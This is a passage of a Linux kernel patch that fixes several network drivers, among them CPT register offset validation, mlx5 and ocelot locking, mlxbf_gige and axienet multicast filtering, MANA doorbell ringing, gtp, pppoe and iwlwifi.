+@@ -663,6 +665,11 @@ static bool is_valid_offset(struct rvu *rvu, struct cpt_rd_wr_reg_msg *req)
+ 		if (lf < 0)
+ 			return false;
+ 
++		/* Translate local LF's offset to global CPT LF's offset to
++		 * access LFX register.
++		 */
++		*reg_offset = (req->reg_offset & 0xFF000) + (lf << 3);
++
+ 		return true;
+ 	} else if (!(req->hdr.pcifunc & RVU_PFVF_FUNC_MASK)) {
+ 		/* Registers that can be accessed from PF */
+@@ -697,7 +704,7 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 					struct cpt_rd_wr_reg_msg *rsp)
+ {
+ 	u64 offset = req->reg_offset;
+-	int blkaddr, lf;
++	int blkaddr;
+ 
+ 	blkaddr = validate_and_get_cpt_blkaddr(req->blkaddr);
+ 	if (blkaddr < 0)
+@@ -708,18 +715,10 @@ int rvu_mbox_handler_cpt_rd_wr_register(struct rvu *rvu,
+ 	    !is_cpt_vf(rvu, req->hdr.pcifunc))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	if (!is_valid_offset(rvu, req))
++	if (!validate_and_update_reg_offset(rvu, req, &offset))
+ 		return CPT_AF_ERR_ACCESS_DENIED;
+ 
+-	/* Translate local LF used by VFs to global CPT LF */
+-	lf = rvu_get_lf(rvu, &rvu->hw->block[blkaddr], req->hdr.pcifunc,
+-			(offset & 0xFFF) >> 3);
+-
+-	/* Translate local LF's offset to global CPT LF's offset */
+-	offset &= 0xFF000;
+-	offset += lf << 3;
+-
+-	rsp->reg_offset = offset;
++	rsp->reg_offset = req->reg_offset;
+ 	rsp->ret_val = req->ret_val;
+ 	rsp->is_write = req->is_write;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
+index 60bc5b577ab99..02d9fb0c5ec24 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_tx.c
+@@ -111,7 +111,9 @@ static int mlx5e_tx_reporter_timeout_recover(void *ctx)
+ 		return err;
+ 	}
+ 
++	mutex_lock(&priv->state_lock);
+ 	err = mlx5e_safe_reopen_channels(priv);
++	mutex_unlock(&priv->state_lock);
+ 	if (!err) {
+ 		to_ctx->status = 1; /* all channels recovered */
+ 		return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
+index aac32e505c14f..a8870c6daec6c 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_fs_ethtool.c
+@@ -738,7 +738,7 @@ mlx5e_ethtool_flow_replace(struct mlx5e_priv *priv,
+ 	if (num_tuples <= 0) {
+ 		netdev_warn(priv->netdev, "%s: flow is not valid %d\n",
+ 			    __func__, num_tuples);
+-		return num_tuples;
++		return num_tuples < 0 ? num_tuples : -EINVAL;
+ 	}
+ 
+ 	eth_ft = get_flow_table(priv, fs, num_tuples);
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
+index 5a1027b072155..bf1a2883f0820 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige.h
+@@ -39,6 +39,7 @@
+  */
+ #define MLXBF_GIGE_BCAST_MAC_FILTER_IDX 0
+ #define MLXBF_GIGE_LOCAL_MAC_FILTER_IDX 1
++#define MLXBF_GIGE_MAX_FILTER_IDX       3
+ 
+ /* Define for broadcast MAC literal */
+ #define BCAST_MAC_ADDR 0xFFFFFFFFFFFF
+@@ -148,9 +149,13 @@ enum mlxbf_gige_res {
+ int mlxbf_gige_mdio_probe(struct platform_device *pdev,
+ 			  struct mlxbf_gige *priv);
+ void mlxbf_gige_mdio_remove(struct mlxbf_gige *priv);
+-irqreturn_t mlxbf_gige_mdio_handle_phy_interrupt(int irq, void *dev_id);
+-void mlxbf_gige_mdio_enable_phy_int(struct mlxbf_gige *priv);
+ 
++void mlxbf_gige_enable_multicast_rx(struct mlxbf_gige *priv);
++void mlxbf_gige_disable_multicast_rx(struct mlxbf_gige *priv);
++void mlxbf_gige_enable_mac_rx_filter(struct mlxbf_gige *priv,
++				     unsigned int index);
++void mlxbf_gige_disable_mac_rx_filter(struct mlxbf_gige *priv,
++				      unsigned int index);
+ void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+ 				  unsigned int index, u64 dmac);
+ void mlxbf_gige_get_mac_rx_filter(struct mlxbf_gige *priv,
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+index d6b4d163bbbfd..6d90576fda597 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_main.c
+@@ -168,6 +168,10 @@ static int mlxbf_gige_open(struct net_device *netdev)
+ 	if (err)
+ 		goto napi_deinit;
+ 
++	mlxbf_gige_enable_mac_rx_filter(priv, MLXBF_GIGE_BCAST_MAC_FILTER_IDX);
++	mlxbf_gige_enable_mac_rx_filter(priv, MLXBF_GIGE_LOCAL_MAC_FILTER_IDX);
++	mlxbf_gige_enable_multicast_rx(priv);
++
+ 	/* Set bits in INT_EN that we care about */
+ 	int_en = MLXBF_GIGE_INT_EN_HW_ACCESS_ERROR |
+ 		 MLXBF_GIGE_INT_EN_TX_CHECKSUM_INPUTS |
+@@ -293,6 +297,7 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	void __iomem *plu_base;
+ 	void __iomem *base;
+ 	int addr, phy_irq;
++	unsigned int i;
+ 	int err;
+ 
+ 	base = devm_platform_ioremap_resource(pdev, MLXBF_GIGE_RES_MAC);
+@@ -335,6 +340,11 @@ static int mlxbf_gige_probe(struct platform_device *pdev)
+ 	priv->rx_q_entries = MLXBF_GIGE_DEFAULT_RXQ_SZ;
+ 	priv->tx_q_entries = MLXBF_GIGE_DEFAULT_TXQ_SZ;
+ 
++	for (i = 0; i <= MLXBF_GIGE_MAX_FILTER_IDX; i++)
++		mlxbf_gige_disable_mac_rx_filter(priv, i);
++	mlxbf_gige_disable_multicast_rx(priv);
++	mlxbf_gige_disable_promisc(priv);
++
+ 	/* Write initial MAC address to hardware */
+ 	mlxbf_gige_initial_mac(priv);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
+index 7be3a793984d5..d27535a1fb86f 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_regs.h
+@@ -59,6 +59,8 @@
+ #define MLXBF_GIGE_TX_STATUS_DATA_FIFO_FULL           BIT(1)
+ #define MLXBF_GIGE_RX_MAC_FILTER_DMAC_RANGE_START     0x0520
+ #define MLXBF_GIGE_RX_MAC_FILTER_DMAC_RANGE_END       0x0528
++#define MLXBF_GIGE_RX_MAC_FILTER_GENERAL              0x0530
++#define MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST         BIT(1)
+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_DISC           0x0540
+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_DISC_EN        BIT(0)
+ #define MLXBF_GIGE_RX_MAC_FILTER_COUNT_PASS           0x0548
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 6999843584934..eb62620b63c7f 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -11,15 +11,31 @@
+ #include "mlxbf_gige.h"
+ #include "mlxbf_gige_regs.h"
+ 
+-void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+-				  unsigned int index, u64 dmac)
++void mlxbf_gige_enable_multicast_rx(struct mlxbf_gige *priv)
+ {
+ 	void __iomem *base = priv->base;
+-	u64 control;
++	u64 data;
+ 
+-	/* Write destination MAC to specified MAC RX filter */
+-	writeq(dmac, base + MLXBF_GIGE_RX_MAC_FILTER +
+-	       (index * MLXBF_GIGE_RX_MAC_FILTER_STRIDE));
++	data = readq(base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++	data |= MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST;
++	writeq(data, base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++}
++
++void mlxbf_gige_disable_multicast_rx(struct mlxbf_gige *priv)
++{
++	void __iomem *base = priv->base;
++	u64 data;
++
++	data = readq(base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++	data &= ~MLXBF_GIGE_RX_MAC_FILTER_EN_MULTICAST;
++	writeq(data, base + MLXBF_GIGE_RX_MAC_FILTER_GENERAL);
++}
++
++void mlxbf_gige_enable_mac_rx_filter(struct mlxbf_gige *priv,
++				     unsigned int index)
++{
++	void __iomem *base = priv->base;
++	u64 control;
+ 
+ 	/* Enable MAC receive filter mask for specified index */
+ 	control = readq(base + MLXBF_GIGE_CONTROL);
+@@ -27,6 +43,28 @@ void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
+ 	writeq(control, base + MLXBF_GIGE_CONTROL);
+ }
+ 
++void mlxbf_gige_disable_mac_rx_filter(struct mlxbf_gige *priv,
++				      unsigned int index)
++{
++	void __iomem *base = priv->base;
++	u64 control;
++
++	/* Disable MAC receive filter mask for specified index */
++	control = readq(base + MLXBF_GIGE_CONTROL);
++	control &= ~(MLXBF_GIGE_CONTROL_EN_SPECIFIC_MAC << index);
++	writeq(control, base + MLXBF_GIGE_CONTROL);
++}
++
++void mlxbf_gige_set_mac_rx_filter(struct mlxbf_gige *priv,
++				  unsigned int index, u64 dmac)
++{
++	void __iomem *base = priv->base;
++
++	/* Write destination MAC to specified MAC RX filter */
++	writeq(dmac, base + MLXBF_GIGE_RX_MAC_FILTER +
++	       (index * MLXBF_GIGE_RX_MAC_FILTER_STRIDE));
++}
++
+ void mlxbf_gige_get_mac_rx_filter(struct mlxbf_gige *priv,
+ 				  unsigned int index, u64 *dmac)
+ {
+diff --git a/drivers/net/ethernet/microsoft/mana/mana.h b/drivers/net/ethernet/microsoft/mana/mana.h
+index d58be64374c84..41c99eabf40a0 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana.h
++++ b/drivers/net/ethernet/microsoft/mana/mana.h
+@@ -262,6 +262,7 @@ struct mana_cq {
+ 	/* NAPI data */
+ 	struct napi_struct napi;
+ 	int work_done;
++	int work_done_since_doorbell;
+ 	int budget;
+ };
+ 
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index b751b03eddfb1..e7d1ce68f05e3 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1311,7 +1311,6 @@ static void mana_poll_rx_cq(struct mana_cq *cq)
+ static int mana_cq_handler(void *context, struct gdma_queue *gdma_queue)
+ {
+ 	struct mana_cq *cq = context;
+-	u8 arm_bit;
+ 	int w;
+ 
+ 	WARN_ON_ONCE(cq->gdma_cq != gdma_queue);
+@@ -1322,16 +1321,23 @@ static int mana_cq_handler(void *context, struct gdma_queue *gdma_queue)
+ 		mana_poll_tx_cq(cq);
+ 
+ 	w = cq->work_done;
+-
+-	if (w < cq->budget &&
+-	    napi_complete_done(&cq->napi, w)) {
+-		arm_bit = SET_ARM_BIT;
+-	} else {
+-		arm_bit = 0;
++	cq->work_done_since_doorbell += w;
++
++	if (w < cq->budget) {
++		mana_gd_ring_cq(gdma_queue, SET_ARM_BIT);
++		cq->work_done_since_doorbell = 0;
++		napi_complete_done(&cq->napi, w);
++	} else if (cq->work_done_since_doorbell >
++		   cq->gdma_cq->queue_size / COMP_ENTRY_SIZE * 4) {
++		/* MANA hardware requires at least one doorbell ring every 8
++		 * wraparounds of CQ even if there is no need to arm the CQ.
++		 * This driver rings the doorbell as soon as we have exceeded
++		 * 4 wraparounds.
++		 */
++		mana_gd_ring_cq(gdma_queue, 0);
++		cq->work_done_since_doorbell = 0;
+ 	}
+ 
+-	mana_gd_ring_cq(gdma_queue, arm_bit);
+-
+ 	return w;
+ }
+ 
+diff --git a/drivers/net/ethernet/mscc/ocelot.c b/drivers/net/ethernet/mscc/ocelot.c
+index 01b6e13f4692f..310a36356f568 100644
+--- a/drivers/net/ethernet/mscc/ocelot.c
++++ b/drivers/net/ethernet/mscc/ocelot.c
+@@ -994,6 +994,48 @@ void ocelot_ptp_rx_timestamp(struct ocelot *ocelot, struct sk_buff *skb,
+ }
+ EXPORT_SYMBOL(ocelot_ptp_rx_timestamp);
+ 
++void ocelot_lock_inj_grp(struct ocelot *ocelot, int grp)
++			 __acquires(&ocelot->inj_lock)
++{
++	spin_lock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_inj_grp);
++
++void ocelot_unlock_inj_grp(struct ocelot *ocelot, int grp)
++			   __releases(&ocelot->inj_lock)
++{
++	spin_unlock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_inj_grp);
++
++void ocelot_lock_xtr_grp(struct ocelot *ocelot, int grp)
++			 __acquires(&ocelot->inj_lock)
++{
++	spin_lock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_xtr_grp);
++
++void ocelot_unlock_xtr_grp(struct ocelot *ocelot, int grp)
++			   __releases(&ocelot->inj_lock)
++{
++	spin_unlock(&ocelot->inj_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_xtr_grp);
++
++void ocelot_lock_xtr_grp_bh(struct ocelot *ocelot, int grp)
++			    __acquires(&ocelot->xtr_lock)
++{
++	spin_lock_bh(&ocelot->xtr_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_lock_xtr_grp_bh);
++
++void ocelot_unlock_xtr_grp_bh(struct ocelot *ocelot, int grp)
++			      __releases(&ocelot->xtr_lock)
++{
++	spin_unlock_bh(&ocelot->xtr_lock);
++}
++EXPORT_SYMBOL_GPL(ocelot_unlock_xtr_grp_bh);
++
+ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **nskb)
+ {
+ 	u64 timestamp, src_port, len;
+@@ -1004,6 +1046,8 @@ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **nskb)
+ 	u32 val, *buf;
+ 	int err;
+ 
++	lockdep_assert_held(&ocelot->xtr_lock);
++
+ 	err = ocelot_xtr_poll_xfh(ocelot, grp, xfh);
+ 	if (err)
+ 		return err;
+@@ -1079,6 +1123,8 @@ bool ocelot_can_inject(struct ocelot *ocelot, int grp)
+ {
+ 	u32 val = ocelot_read(ocelot, QS_INJ_STATUS);
+ 
++	lockdep_assert_held(&ocelot->inj_lock);
++
+ 	if (!(val & QS_INJ_STATUS_FIFO_RDY(BIT(grp))))
+ 		return false;
+ 	if (val & QS_INJ_STATUS_WMARK_REACHED(BIT(grp)))
+@@ -1088,28 +1134,55 @@ bool ocelot_can_inject(struct ocelot *ocelot, int grp)
+ }
+ EXPORT_SYMBOL(ocelot_can_inject);
+ 
+-void ocelot_ifh_port_set(void *ifh, int port, u32 rew_op, u32 vlan_tag)
++/**
++ * ocelot_ifh_set_basic - Set basic information in Injection Frame Header
++ * @ifh: Pointer to Injection Frame Header memory
++ * @ocelot: Switch private data structure
++ * @port: Egress port number
++ * @rew_op: Egress rewriter operation for PTP
++ * @skb: Pointer to socket buffer (packet)
++ *
++ * Populate the Injection Frame Header with basic information for this skb: the
++ * analyzer bypass bit, destination port, VLAN info, egress rewriter info.
++ */
++void ocelot_ifh_set_basic(void *ifh, struct ocelot *ocelot, int port,
++			  u32 rew_op, struct sk_buff *skb)
+ {
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
++	struct net_device *dev = skb->dev;
++	u64 vlan_tci, tag_type;
++	int qos_class;
++
++	ocelot_xmit_get_vlan_info(skb, ocelot_port->bridge, &vlan_tci,
++				  &tag_type);
++
++	qos_class = netdev_get_num_tc(dev) ?
++		    netdev_get_prio_tc_map(dev, skb->priority) : skb->priority;
++
++	memset(ifh, 0, OCELOT_TAG_LEN);
+ 	ocelot_ifh_set_bypass(ifh, 1);
++	ocelot_ifh_set_src(ifh, BIT_ULL(ocelot->num_phys_ports));
+ 	ocelot_ifh_set_dest(ifh, BIT_ULL(port));
+-	ocelot_ifh_set_tag_type(ifh, IFH_TAG_TYPE_C);
+-	if (vlan_tag)
+-		ocelot_ifh_set_vlan_tci(ifh, vlan_tag);
++	ocelot_ifh_set_qos_class(ifh, qos_class);
++	ocelot_ifh_set_tag_type(ifh, tag_type);
++	ocelot_ifh_set_vlan_tci(ifh, vlan_tci);
+ 	if (rew_op)
+ 		ocelot_ifh_set_rew_op(ifh, rew_op);
+ }
+-EXPORT_SYMBOL(ocelot_ifh_port_set);
++EXPORT_SYMBOL(ocelot_ifh_set_basic);
+ 
+ void ocelot_port_inject_frame(struct ocelot *ocelot, int port, int grp,
+ 			      u32 rew_op, struct sk_buff *skb)
+ {
+-	u32 ifh[OCELOT_TAG_LEN / 4] = {0};
++	u32 ifh[OCELOT_TAG_LEN / 4];
+ 	unsigned int i, count, last;
+ 
++	lockdep_assert_held(&ocelot->inj_lock);
++
+ 	ocelot_write_rix(ocelot, QS_INJ_CTRL_GAP_SIZE(1) |
+ 			 QS_INJ_CTRL_SOF, QS_INJ_CTRL, grp);
+ 
+-	ocelot_ifh_port_set(ifh, port, rew_op, skb_vlan_tag_get(skb));
++	ocelot_ifh_set_basic(ifh, ocelot, port, rew_op, skb);
+ 
+ 	for (i = 0; i < OCELOT_TAG_LEN / 4; i++)
+ 		ocelot_write_rix(ocelot, ifh[i], QS_INJ_WR, grp);
+@@ -1142,6 +1215,8 @@ EXPORT_SYMBOL(ocelot_port_inject_frame);
+ 
+ void ocelot_drain_cpu_queue(struct ocelot *ocelot, int grp)
+ {
++	lockdep_assert_held(&ocelot->xtr_lock);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp))
+ 		ocelot_read_rix(ocelot, QS_XTR_RD, grp);
+ }
+@@ -2733,6 +2808,8 @@ int ocelot_init(struct ocelot *ocelot)
+ 	mutex_init(&ocelot->tas_lock);
+ 	spin_lock_init(&ocelot->ptp_clock_lock);
+ 	spin_lock_init(&ocelot->ts_id_lock);
++	spin_lock_init(&ocelot->inj_lock);
++	spin_lock_init(&ocelot->xtr_lock);
+ 
+ 	ocelot->owq = alloc_ordered_workqueue("ocelot-owq", 0);
+ 	if (!ocelot->owq)
+diff --git a/drivers/net/ethernet/mscc/ocelot_fdma.c b/drivers/net/ethernet/mscc/ocelot_fdma.c
+index 8e3894cf5f7cd..cc9bce5a4dcdf 100644
+--- a/drivers/net/ethernet/mscc/ocelot_fdma.c
++++ b/drivers/net/ethernet/mscc/ocelot_fdma.c
+@@ -665,8 +665,7 @@ static int ocelot_fdma_prepare_skb(struct ocelot *ocelot, int port, u32 rew_op,
+ 
+ 	ifh = skb_push(skb, OCELOT_TAG_LEN);
+ 	skb_put(skb, ETH_FCS_LEN);
+-	memset(ifh, 0, OCELOT_TAG_LEN);
+-	ocelot_ifh_port_set(ifh, port, rew_op, skb_vlan_tag_get(skb));
++	ocelot_ifh_set_basic(ifh, ocelot, port, rew_op, skb);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/mscc/ocelot_vsc7514.c b/drivers/net/ethernet/mscc/ocelot_vsc7514.c
+index 6f22aea08a644..bf39a053dc82f 100644
+--- a/drivers/net/ethernet/mscc/ocelot_vsc7514.c
++++ b/drivers/net/ethernet/mscc/ocelot_vsc7514.c
+@@ -159,6 +159,8 @@ static irqreturn_t ocelot_xtr_irq_handler(int irq, void *arg)
+ 	struct ocelot *ocelot = arg;
+ 	int grp = 0, err;
+ 
++	ocelot_lock_xtr_grp(ocelot, grp);
++
+ 	while (ocelot_read(ocelot, QS_XTR_DATA_PRESENT) & BIT(grp)) {
+ 		struct sk_buff *skb;
+ 
+@@ -177,6 +179,8 @@ static irqreturn_t ocelot_xtr_irq_handler(int irq, void *arg)
+ 	if (err < 0)
+ 		ocelot_drain_cpu_queue(ocelot, 0);
+ 
++	ocelot_unlock_xtr_grp(ocelot, grp);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet.h b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+index 6370c447ac5ca..503c32413474a 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet.h
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet.h
+@@ -159,16 +159,17 @@
+ #define XAE_RCW1_OFFSET		0x00000404 /* Rx Configuration Word 1 */
+ #define XAE_TC_OFFSET		0x00000408 /* Tx Configuration */
+ #define XAE_FCC_OFFSET		0x0000040C /* Flow Control Configuration */
+-#define XAE_EMMC_OFFSET		0x00000410 /* EMAC mode configuration */
+-#define XAE_PHYC_OFFSET		0x00000414 /* RGMII/SGMII configuration */
++#define XAE_EMMC_OFFSET		0x00000410 /* MAC speed configuration */
++#define XAE_PHYC_OFFSET		0x00000414 /* RX Max Frame Configuration */
+ #define XAE_ID_OFFSET		0x000004F8 /* Identification register */
+-#define XAE_MDIO_MC_OFFSET	0x00000500 /* MII Management Config */
+-#define XAE_MDIO_MCR_OFFSET	0x00000504 /* MII Management Control */
+-#define XAE_MDIO_MWD_OFFSET	0x00000508 /* MII Management Write Data */
+-#define XAE_MDIO_MRD_OFFSET	0x0000050C /* MII Management Read Data */
++#define XAE_MDIO_MC_OFFSET	0x00000500 /* MDIO Setup */
++#define XAE_MDIO_MCR_OFFSET	0x00000504 /* MDIO Control */
++#define XAE_MDIO_MWD_OFFSET	0x00000508 /* MDIO Write Data */
++#define XAE_MDIO_MRD_OFFSET	0x0000050C /* MDIO Read Data */
+ #define XAE_UAW0_OFFSET		0x00000700 /* Unicast address word 0 */
+ #define XAE_UAW1_OFFSET		0x00000704 /* Unicast address word 1 */
+-#define XAE_FMI_OFFSET		0x00000708 /* Filter Mask Index */
++#define XAE_FMI_OFFSET		0x00000708 /* Frame Filter Control */
++#define XAE_FFE_OFFSET		0x0000070C /* Frame Filter Enable */
+ #define XAE_AF0_OFFSET		0x00000710 /* Address Filter 0 */
+ #define XAE_AF1_OFFSET		0x00000714 /* Address Filter 1 */
+ 
+@@ -307,7 +308,7 @@
+  */
+ #define XAE_UAW1_UNICASTADDR_MASK	0x0000FFFF
+ 
+-/* Bit masks for Axi Ethernet FMI register */
++/* Bit masks for Axi Ethernet FMC register */
+ #define XAE_FMI_PM_MASK			0x80000000 /* Promis. mode enable */
+ #define XAE_FMI_IND_MASK		0x00000003 /* Index Mask */
+ 
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index ff777735be66b..59d1cfbf7d6b7 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -411,7 +411,7 @@ static int netdev_set_mac_address(struct net_device *ndev, void *p)
+  */
+ static void axienet_set_multicast_list(struct net_device *ndev)
+ {
+-	int i;
++	int i = 0;
+ 	u32 reg, af0reg, af1reg;
+ 	struct axienet_local *lp = netdev_priv(ndev);
+ 
+@@ -429,7 +429,10 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 	} else if (!netdev_mc_empty(ndev)) {
+ 		struct netdev_hw_addr *ha;
+ 
+-		i = 0;
++		reg = axienet_ior(lp, XAE_FMI_OFFSET);
++		reg &= ~XAE_FMI_PM_MASK;
++		axienet_iow(lp, XAE_FMI_OFFSET, reg);
++
+ 		netdev_for_each_mc_addr(ha, ndev) {
+ 			if (i >= XAE_MULTICAST_CAM_TABLE_NUM)
+ 				break;
+@@ -448,6 +451,7 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 			axienet_iow(lp, XAE_FMI_OFFSET, reg);
+ 			axienet_iow(lp, XAE_AF0_OFFSET, af0reg);
+ 			axienet_iow(lp, XAE_AF1_OFFSET, af1reg);
++			axienet_iow(lp, XAE_FFE_OFFSET, 1);
+ 			i++;
+ 		}
+ 	} else {
+@@ -455,18 +459,15 @@ static void axienet_set_multicast_list(struct net_device *ndev)
+ 		reg &= ~XAE_FMI_PM_MASK;
+ 
+ 		axienet_iow(lp, XAE_FMI_OFFSET, reg);
+-
+-		for (i = 0; i < XAE_MULTICAST_CAM_TABLE_NUM; i++) {
+-			reg = axienet_ior(lp, XAE_FMI_OFFSET) & 0xFFFFFF00;
+-			reg |= i;
+-
+-			axienet_iow(lp, XAE_FMI_OFFSET, reg);
+-			axienet_iow(lp, XAE_AF0_OFFSET, 0);
+-			axienet_iow(lp, XAE_AF1_OFFSET, 0);
+-		}
+-
+ 		dev_info(&ndev->dev, "Promiscuous mode disabled.\n");
+ 	}
++
++	for (; i < XAE_MULTICAST_CAM_TABLE_NUM; i++) {
++		reg = axienet_ior(lp, XAE_FMI_OFFSET) & 0xFFFFFF00;
++		reg |= i;
++		axienet_iow(lp, XAE_FMI_OFFSET, reg);
++		axienet_iow(lp, XAE_FFE_OFFSET, 0);
++	}
+ }
+ 
+ /**
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 05b5914d83582..512daeb14e28b 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -900,6 +900,9 @@ static netdev_tx_t gtp_dev_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	if (skb_cow_head(skb, dev->needed_headroom))
+ 		goto tx_err;
+ 
++	if (!pskb_inet_may_pull(skb))
++		goto tx_err;
++
+ 	skb_reset_inner_headers(skb);
+ 
+ 	/* PDP context lookups in gtp_build_skb_*() need rcu read-side lock. */
+diff --git a/drivers/net/ppp/pppoe.c b/drivers/net/ppp/pppoe.c
+index ce2cbb5903d7b..c6f44af35889d 100644
+--- a/drivers/net/ppp/pppoe.c
++++ b/drivers/net/ppp/pppoe.c
+@@ -1007,26 +1007,21 @@ static int pppoe_recvmsg(struct socket *sock, struct msghdr *m,
+ 	struct sk_buff *skb;
+ 	int error = 0;
+ 
+-	if (sk->sk_state & PPPOX_BOUND) {
+-		error = -EIO;
+-		goto end;
+-	}
++	if (sk->sk_state & PPPOX_BOUND)
++		return -EIO;
+ 
+ 	skb = skb_recv_datagram(sk, flags, &error);
+-	if (error < 0)
+-		goto end;
++	if (!skb)
++		return error;
+ 
+-	if (skb) {
+-		total_len = min_t(size_t, total_len, skb->len);
+-		error = skb_copy_datagram_msg(skb, 0, m, total_len);
+-		if (error == 0) {
+-			consume_skb(skb);
+-			return total_len;
+-		}
++	total_len = min_t(size_t, total_len, skb->len);
++	error = skb_copy_datagram_msg(skb, 0, m, total_len);
++	if (error == 0) {
++		consume_skb(skb);
++		return total_len;
+ 	}
+ 
+ 	kfree_skb(skb);
+-end:
+ 	return error;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+index 607e07ed2477c..7d4340c56628a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/debugfs.c
+@@ -163,7 +163,11 @@ static int iwl_dbgfs_enabled_severities_write(struct iwl_fw_runtime *fwrt,
+ 
+ 	event_cfg.enabled_severities = cpu_to_le32(enabled_severities);
+ 
+-	ret = iwl_trans_send_cmd(fwrt->trans, &hcmd);
++	if (fwrt->ops && fwrt->ops->send_hcmd)
++		ret = fwrt->ops->send_hcmd(fwrt->ops_ctx, &hcmd);
++	else
++		ret = -EPERM;
++
+ 	IWL_INFO(fwrt,
+ 		 "sent host event cfg with enabled_severities: %u, ret: %d\n",
+ 		 enabled_severities, ret);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index 069bac72117fe..b58441c2af730 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -3226,7 +3226,7 @@ int iwl_mvm_scan_stop(struct iwl_mvm *mvm, int type, bool notify)
+ 	if (!(mvm->scan_status & type))
+ 		return 0;
+ 
+-	if (iwl_mvm_is_radio_killed(mvm)) {
++	if (!test_bit(STATUS_DEVICE_ENABLED, &mvm->trans->status)) {
+ 		ret = 0;
+ 		goto out;
+ 	}
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index 54ab8b54369ba..4ab3a14567b65 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -33,7 +33,7 @@ static int mwifiex_11n_dispatch_amsdu_pkt(struct mwifiex_private *priv,
+ 		skb_trim(skb, le16_to_cpu(local_rx_pd->rx_pkt_length));
+ 
